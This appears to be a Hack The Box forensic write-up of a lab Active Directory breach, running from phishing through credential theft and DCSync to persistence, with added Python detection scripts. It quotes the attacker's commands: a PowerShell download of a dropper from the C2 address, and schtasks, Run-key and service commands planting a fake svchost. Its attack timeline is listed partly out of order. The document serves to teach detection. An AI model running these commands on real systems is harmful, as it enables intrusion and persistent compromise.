
HTB-GhostTrace

Difficulty: Easy
OS: Windows
Date: 2026-01-31

Description:
Investigation of an Active Directory breach in the Main.local domain involving DC01 and two clients (Client02, Client03). A user on Client02 received a phishing email that led to full domain compromise.

TL;DR

Analysis of the Windows Event Logs revealed a complete AD compromise chain: phishing email with a macro-enabled document → credential dumping with Mimikatz → lateral movement via PsExec → DCSync attack → domain admin compromise → persistence via a scheduled task, a service, and a registry Run key.

Attack Timeline

2025-05-25 03:27:56 UTC - Initial compromise (Client02)
2025-05-25 03:32:02 UTC - Dropper download
2025-05-25 04:28:17 UTC - Reverse shell established
2025-05-25 03:37:00 UTC - PowerView downloaded
2025-05-25 03:42:33 UTC - Kerberoasting (sqlsvc)
2025-05-25 04:03:47 UTC - Lateral movement to Client03
2025-05-25 04:10:43 UTC - Mimikatz execution
2025-05-25 04:12:21 UTC - Credential abuse (lucas)
2025-05-25 04:26:36 UTC - DCSync attack
2025-05-25 04:34:01 UTC - Domain Admin access
2025-05-25 04:38:53 UTC - Persistence established

Initial Access

T1566.001
At 2025-05-25 03:27:56 UTC, user MAIN\jody opened a malicious macro-enabled document:

Process: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File: C:\Users\jody\Downloads\Profits.docm
Parent: C:\Windows\explorer.exe (PID 2092)
PID: 1160

SHA256: 1C254F5E03462A7C232265E913162DF2AAE6B5EA5056284512BB32343C0A9507

Execution

The macro spawned a command shell, which launched PowerShell (PID 4776):

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent: C:\Windows\System32\cmd.exe (PID 8996)
Working Directory: C:\Users\jody\Documents\
User: MAIN\jody

T1105
At 2025-05-25 03:32:02 UTC, the attacker downloaded a dropper:

Invoke-WebRequest -Uri "http://192.168.204.152/UpdatePolicy.exe" -OutFile "C:\Users\jody\Downloads\UpdatePolicy.exe"

C2 Server: 192.168.204.152

T1071.001
At 2025-05-25 04:28:17 UTC, a reverse shell was established:

Process: C:\Users\jody\Downloads\UpdatePolicy.exe (PID 4352)
Source: 192.168.204.129:49956
Destination: 192.168.204.152:1337
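The execution chain above (Office document → cmd.exe → PowerShell download cradle) is the kind of parent/child relationship a detection should key on. The following is an added example, not code from the original write-up: it rebuilds a process tree from process-creation records (Sysmon Event 1 or Security 4688 style) and flags shells with an Office application in their ancestry, noting a download cradle or a raw-IP URL in the command line. The record layout is an assumption; the PIDs and paths mirror the write-up, the parent of cmd.exe is assumed to be WINWORD.EXE, and the event list is constructed.

```python
# Added example, not part of the original write-up. Record layout is an assumption;
# PIDs/paths mirror the write-up; the parent of cmd.exe (WINWORD.EXE) is assumed.
from __future__ import annotations
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b|\bwget\b|certutil", re.I)
RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b", re.I)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str
    user: str
    time: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(ev, by_pid, max_depth=8):
    """[ev, parent, grandparent, ...], stopping at the root or on a PID cycle."""
    chain, seen, cur = [ev], {ev.pid}, ev
    while cur.ppid in by_pid and cur.ppid not in seen and len(chain) < max_depth:
        cur = by_pid[cur.ppid]
        seen.add(cur.pid)
        chain.append(cur)
    return chain


def find_office_spawned_shells(events):
    """Shells whose ancestry contains an Office app, with the reasons they were flagged."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if basename(ev.image) not in SHELLS:
            continue
        chain = ancestry(ev, by_pid)
        if not any(basename(p.image) in OFFICE_APPS for p in chain[1:]):
            continue
        reasons = ["office-spawned shell"]
        if DOWNLOAD_CRADLE.search(ev.cmdline):
            reasons.append("download cradle")
        if RAW_IP_URL.search(ev.cmdline):
            reasons.append("raw-IP URL")
        findings.append({"pid": ev.pid, "user": ev.user, "time": ev.time,
                         "chain": " -> ".join(basename(p.image) for p in reversed(chain)),
                         "reasons": reasons})
    return findings


# Constructed sample events mirroring the write-up's chain.
SAMPLE_EVENTS = [
    ProcEvent(2092, 1000, r"C:\Windows\explorer.exe", "explorer.exe", r"MAIN\jody", "03:27:00"),
    ProcEvent(1160, 2092, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"WINWORD.EXE" /n "C:\Users\jody\Downloads\Profits.docm"', r"MAIN\jody", "03:27:56"),
    ProcEvent(8996, 1160, r"C:\Windows\System32\cmd.exe", "cmd.exe /c powershell", r"MAIN\jody", "03:28:01"),
    ProcEvent(4776, 8996, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell Invoke-WebRequest -Uri "http://192.168.204.152/UpdatePolicy.exe" '
              r'-OutFile "C:\Users\jody\Downloads\UpdatePolicy.exe"', r"MAIN\jody", "03:32:02"),
    # benign: a prompt opened straight from explorer, no Office ancestor
    ProcEvent(5555, 2092, r"C:\Windows\System32\cmd.exe", "cmd.exe", r"MAIN\jody", "03:40:00"),
]

if __name__ == "__main__":
    for finding in find_office_spawned_shells(SAMPLE_EVENTS):
        print(finding)
```

On a real host, key the tree on PID plus process start time (or Sysmon's ProcessGuid), since PIDs are reused; the bare PID lookup here is enough for a single short capture like this one.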

Discovery

T1087.002
At 2025-05-25 03:37:00 UTC, PowerView was downloaded for AD enumeration:

ScriptBlock ID: 232ebf81-40d1-402f-8910-9ee157bc7dca
Path: C:\Users\jody\Downloads\PowerView.ps1

Credential Access

T1558.003
At 2025-05-25 03:42:33 UTC, a Kerberos TGS was requested for the service account:

Account: jody@MAIN.LOCAL
Service: sqlsvc (S-1-5-21-620716483-2719109048-3577772375-2115)
Ticket Encryption: 0x17 (RC4-HMAC)
Ticket Options: 0x40810000
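The 4769 record above carries the two fields that make Kerberoasting visible: an RC4-HMAC (0x17) ticket requested by a user principal for a user-style service account. The following is an added example, not code from the original write-up: it triages constructed 4769 records with those fields and decodes the Ticket Options value using the documented bit layout of that event (bit 1 = 0x40000000 forwardable, bit 8 = 0x00800000 renewable, bit 15 = 0x00010000 canonicalize). The per-event dict layout and the sample records are assumptions.

```python
# Added example, not part of the original write-up. Record layout is an assumption;
# the first sample record mirrors the request quoted above.
from collections import defaultdict

RC4_HMAC = 0x17              # Ticket Encryption Type quoted in the write-up
AES256_CTS_HMAC_SHA1 = 0x12  # what a current client normally negotiates

# Ticket Options bit meanings, from the documented 4769 layout (bit 1 = 0x40000000).
TICKET_OPTION_BITS = {
    0x40000000: "forwardable",
    0x00800000: "renewable",
    0x00010000: "canonicalize",
}


def decode_ticket_options(value):
    """Name the flags set in a Ticket Options value, most significant first."""
    return [name for bit, name in sorted(TICKET_OPTION_BITS.items(), reverse=True) if value & bit]


def is_kerberoast_candidate(ev):
    """A successful 4769 where a user principal asks for an RC4 ticket to a
    user-style service account (an SPN on a user, not a machine or krbtgt)."""
    if ev["event_id"] != 4769 or ev["status"] != 0x0:
        return False
    account = ev["account"].split("@")[0]
    service = ev["service"]
    if account.endswith("$") or service.endswith("$"):
        return False                 # machine-to-machine traffic is noisy and expected
    if service.lower() == "krbtgt":
        return False                 # TGT renewals also land in 4769
    return ev["ticket_encryption"] == RC4_HMAC


def kerberoast_summary(events, min_services=1):
    """Map each requesting account to the distinct RC4 service targets it hit.
    Raise min_services on domains where a single RC4 request is still routine."""
    hits = defaultdict(set)
    for ev in events:
        if is_kerberoast_candidate(ev):
            hits[ev["account"]].add(ev["service"])
    return {acct: sorted(svcs) for acct, svcs in hits.items() if len(svcs) >= min_services}


# Constructed sample: the first record mirrors the request described above.
SAMPLE_4769 = [
    {"event_id": 4769, "time": "03:42:33", "account": "jody@MAIN.LOCAL", "service": "sqlsvc",
     "ticket_encryption": 0x17, "ticket_options": 0x40810000, "status": 0x0},
    {"event_id": 4769, "time": "03:50:10", "account": "alice@MAIN.LOCAL", "service": "sqlsvc",
     "ticket_encryption": 0x12, "ticket_options": 0x40810000, "status": 0x0},   # AES: normal
    {"event_id": 4769, "time": "03:51:00", "account": "CLIENT03$@MAIN.LOCAL", "service": "DC01$",
     "ticket_encryption": 0x17, "ticket_options": 0x40810000, "status": 0x0},   # machine accounts
    {"event_id": 4769, "time": "03:52:30", "account": "jody@MAIN.LOCAL", "service": "websvc",
     "ticket_encryption": 0x17, "ticket_options": 0x40810000, "status": 0x7},   # failed request
]

if __name__ == "__main__":
    print(kerberoast_summary(SAMPLE_4769))
    print(decode_ticket_options(0x40810000))
```

Two things worth keeping in mind when running this over a real Security log: RC4 requests also show up when a service account has never had AES keys set, so the actionable signal is usually a user account requesting RC4 tickets for several SPNs in a short window, and 0x40810000 itself is the ordinary Windows default (forwardable, renewable, canonicalize), not an indicator on its own.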

The attacker successfully cracked the service account credentials offline.

T1003.001
At 2025-05-25 04:10:43 UTC, Mimikatz was executed on Client02, masquerading as netdiag.exe:

Process: C:\Users\jody\Downloads\netdiag.exe
Parent: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 6304)
User: NT AUTHORITY\SYSTEM
Time: 2025-05-25 04:10:43 UTC

Credentials obtained: MAIN\lucas (cleartext password)

Lateral Movement

T1021.002
At 2025-05-25 04:03:47 UTC, lateral movement to Client03 was performed via a renamed PsExec:

Process: C:\Windows\VgYTbFEK.exe
User: NT AUTHORITY\SYSTEM
Time: 2025-05-25 04:05:12 UTC

Post-exploitation commands executed at 04:07:57 UTC:

whoami          # Verify SYSTEM privileges
net user        # Enumerate local accounts (04:08:23 UTC)

T1078.002
At 2025-05-25 04:12:21 UTC, the attacker used the stolen credentials:

runas /user:Main\lucas cmd

Logon record for the service account:

Account: sqlsvc
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Logon Time: 2025-05-25 04:03:47 UTC
Error Code: 0x0 (Success)

Privilege Escalation

T1003.006
At 2025-05-25 04:26:36 UTC, a DCSync attack was executed against DC01:

Subject: MAIN\lucas (S-1-5-21-620716483-2719109048-3577772375-2114)
Object Server: DS
Access List: DS-Replication-Get-Changes-All
Property GUID: {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}

This GUID corresponds to the DS-Replication-Get-Changes-All extended right, allowing replication of KRBTGT hash and all domain credentials.
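The detection for DCSync is the 4662 record above with the replication GUID in its Properties field and a subject that is not a domain controller's machine account. The following is an added example, not code from the original write-up: it maps the three directory-replication control-access-right GUIDs from the AD schema to their names and reports any non-DC subject exercising one against the Directory Service. The per-event dict layout is an assumption and the sample records are constructed around the write-up's values, with DC01 taken as the domain's DC.

```python
# Added example, not part of the original write-up. Record layout is an assumption;
# the GUID-to-right mapping is the AD schema's; sample records are constructed.
import re

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def replication_rights_in(properties):
    """Return the replication rights named by the GUIDs in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def detect_dcsync(events, domain_controllers):
    """Findings for non-DC subjects exercising a replication right against the DS.
    full_dump is True when Get-Changes-All (secrets included) was used."""
    dc_accounts = {dc.upper().rstrip("$") + "$" for dc in domain_controllers}
    findings = []
    for ev in events:
        if ev["event_id"] != 4662 or ev["object_server"] != "DS":
            continue
        rights = replication_rights_in(ev["properties"])
        if not rights:
            continue
        subject = ev["subject"].split("\\")[-1].upper()
        if subject in dc_accounts:
            continue                          # DC-to-DC replication is expected
        findings.append({"time": ev["time"], "subject": ev["subject"], "rights": rights,
                         "full_dump": "DS-Replication-Get-Changes-All" in rights})
    return findings


# Constructed sample records.
SAMPLE_4662 = [
    # the request the write-up describes
    {"event_id": 4662, "time": "04:26:36", "subject": r"MAIN\lucas", "object_server": "DS",
     "properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    # normal replication between domain controllers
    {"event_id": 4662, "time": "04:27:00", "subject": r"MAIN\DC01$", "object_server": "DS",
     "properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    # an ordinary attribute access by the same user; the GUID is a constructed placeholder
    {"event_id": 4662, "time": "04:27:10", "subject": r"MAIN\lucas", "object_server": "DS",
     "properties": "{ffffffff-1111-2222-3333-444444444444}"},
]

if __name__ == "__main__":
    for finding in detect_dcsync(SAMPLE_4662, ["DC01"]):
        print(finding)
```

Azure AD Connect or other directory-sync accounts will legitimately appear with these rights; add them to an allowlist the same way the DC accounts are handled here rather than suppressing the rule.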

Domain Admin Access: 2025-05-25 04:34:01 UTC

Persistence

T1053.005
At 2025-05-25 04:38:53 UTC:

Process: C:\Windows\System32\schtasks.exe
CommandLine: schtasks.exe /create /tn WindowsUpdateCheck /tr C:\Windows\System32\scvhost.exe /sc onstart /ru SYSTEM /f
User: MAIN\Administrator
Parent: C:\Windows\System32\wsmprovhost.exe (WinRM)

T1547.001
At 2025-05-25 04:40:09 UTC:

Process: C:\Windows\System32\reg.exe
CommandLine: reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v xcvafctr /t REG_SZ /d C:\Windows\System32\scvhost.exe /f
User: MAIN\Administrator
Parent: C:\Windows\System32\wsmprovhost.exe (WinRM)

T1543.003
At 2025-05-25 04:43:01 UTC:

Process: C:\Windows\System32\sc.exe
CommandLine: sc.exe create WindowsUpdateSvc binPath= C:\Windows\System32\scvhost.exe start= auto
User: MAIN\Administrator
Parent: C:\Windows\System32\wsmprovhost.exe (WinRM)

Persistence Payload: C:\Windows\System32\scvhost.exe (typosquatting svchost.exe)
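All three persistence mechanisms above point at the same payload, and its file name is one character swap away from svchost.exe. The following is an added example, not code from the original write-up: it extracts the payload path from schtasks /create, reg add ...\Run and sc create command lines and flags payload names within a small edit distance of a well-known Windows binary. The command lines are the write-up's own plus two constructed benign ones; the list of known binaries is an assumption.

```python
# Added example, not part of the original write-up. Known-binary list is an assumption;
# the three persistence command lines are the write-up's, the benign ones are constructed.
import re

KNOWN_SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe",
                         "winlogon.exe", "explorer.exe", "smss.exe", "wininit.exe"}


def levenshtein(a, b):
    """Edit distance; a transposition such as scvhost/svchost costs 2."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(filename, max_distance=2):
    """The system binary this name imitates, or None if it is exact or unrelated."""
    name = filename.lower()
    if name in KNOWN_SYSTEM_BINARIES:
        return None
    dist, known = min((levenshtein(name, k), k) for k in KNOWN_SYSTEM_BINARIES)
    return known if dist <= max_distance else None


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def _value_after(toks, low, flag):
    """Token following `flag` (case-insensitive), or None if absent or last."""
    if flag not in low:
        return None
    i = low.index(flag)
    return toks[i + 1] if i + 1 < len(toks) else None


def classify_persistence(cmdline):
    """Return (technique, payload path) for a persistence command line, else None."""
    toks = tokenize(cmdline)
    if not toks:
        return None
    low = [t.lower() for t in toks]
    exe = low[0].rsplit("\\", 1)[-1]
    if exe in ("schtasks.exe", "schtasks") and "/create" in low:
        return ("T1053.005 scheduled task", _value_after(toks, low, "/tr"))
    if exe in ("reg.exe", "reg") and low[1:2] == ["add"] and len(low) > 2 \
            and "\\currentversion\\run" in low[2]:
        return ("T1547.001 run key", _value_after(toks, low, "/d"))
    if exe in ("sc.exe", "sc") and "create" in low:
        return ("T1543.003 service", _value_after(toks, low, "binpath="))
    return None


def persistence_findings(cmdlines):
    out = []
    for cmd in cmdlines:
        hit = classify_persistence(cmd)
        if hit is None or hit[1] is None:
            continue
        technique, target = hit
        out.append({"technique": technique, "target": target,
                    "lookalike_of": lookalike_of(target.rsplit("\\", 1)[-1])})
    return out


SAMPLE_CMDLINES = [
    r"schtasks.exe /create /tn WindowsUpdateCheck /tr C:\Windows\System32\scvhost.exe /sc onstart /ru SYSTEM /f",
    r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v xcvafctr /t REG_SZ /d C:\Windows\System32\scvhost.exe /f",
    r"sc.exe create WindowsUpdateSvc binPath= C:\Windows\System32\scvhost.exe start= auto",
    r"schtasks.exe /query /tn WindowsUpdateCheck",                          # constructed, benign
    r"reg.exe query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",     # constructed, benign
]

if __name__ == "__main__":
    for finding in persistence_findings(SAMPLE_CMDLINES):
        print(finding)
```

The same lookalike check applied to the write-up's process-creation records would have caught the payload when it was first written to System32, before any of the three persistence commands ran; a path under System32 that is not in the known-binary set but is within two edits of one is a cheap, low-noise rule.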

Indicators of Compromise

Files:

  • C:\Users\jody\Downloads\Profits.docm (SHA256: 1C254F5E03462A7C232265E913162DF2AAE6B5EA5056284512BB32343C0A9507)
  • C:\Users\jody\Downloads\UpdatePolicy.exe
  • C:\Users\jody\Downloads\PowerView.ps1
  • C:\Users\jody\Downloads\netdiag.exe (Mimikatz)
  • C:\Windows\VgYTbFEK.exe (PsExec)
  • C:\Windows\System32\scvhost.exe (Persistence backdoor)

Network:

  • C2 Server: 192.168.204.152:1337
  • Victim: 192.168.204.129

Compromised Accounts:

  • MAIN\jody (initial victim)
  • MAIN\sqlsvc (service account - Kerberoasted)
  • MAIN\lucas (domain user)
  • MAIN\Administrator (domain admin)

Scheduled Task: WindowsUpdateCheck
Service: WindowsUpdateSvc
Registry Run Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\xcvafctr